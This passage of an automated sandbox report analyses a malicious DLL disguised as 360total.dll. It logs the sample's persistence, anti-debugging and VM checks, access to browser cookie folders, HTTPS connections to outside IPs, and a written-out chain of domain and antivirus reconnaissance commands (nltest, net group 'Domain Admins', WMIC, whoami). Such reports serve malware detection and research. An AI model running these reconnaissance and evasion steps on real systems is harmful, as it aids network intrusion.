Source: 360total.dll.dll Static PE information: section name: wsgi2
Source: Update_27361bf8.dll.4.dr Static PE information: section name: wsgi2
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010451 push rcx; ret 3_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001045A push rcx; ret 3_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001801758FC push rsp; ret 3_2_00000001801758FD
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180175CDE push 2027C70Fh; ret 3_2_0000000180175CE5

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\rundll32.exe File deleted: c:\users\user\desktop\360total.dll.dll
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_0000000180062148
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 3_2_00000001800655A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E76DC rdtsc 8_3_000001E3B57E76DC
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 4_2_00000237C16C68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 4_2_00000237C16C7FA8
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 545 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 668 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8786 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll Jump to dropped file
Source: C:\Windows\System32\rundll32.exe API coverage: 0.1 %
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep count: 545 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep time: -545000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2952 Thread sleep count: 668 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2952 Thread sleep time: -66800s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep count: 8786 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep time: -8786000s >= -30000s Jump to behavior
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000237C16CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000237C16C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW, 8_3_000001E3B57E16F4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA, 8_3_000001E3B57E6604
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57EAC90 GetSystemInfo, 8_3_000001E3B57EAC90
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\ Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365701357.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000008.00000003.3366424299.000001E3B57B0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: rundll32.exe, 00000004.00000002.2009327636.00000237C16F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rod_VMware_SATA_CD00
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 3_2_0000000180066C3C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000A7AC GetProcessHeap, 3_2_000000018000A7AC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.84.207 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle, 3_2_0000000180066A50
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: Update_27361bf8.dll.4.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A304 GetSystemTimeAsFileTime, 3_2_000000018006A304
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C8AE0 GetUserNameA,wsprintfA, 4_2_00000237C16C8AE0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5879708 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 8_3_000001E3B5879708
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 3_2_0000000180040CB0
Source: C:\Windows\System32\nltest.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
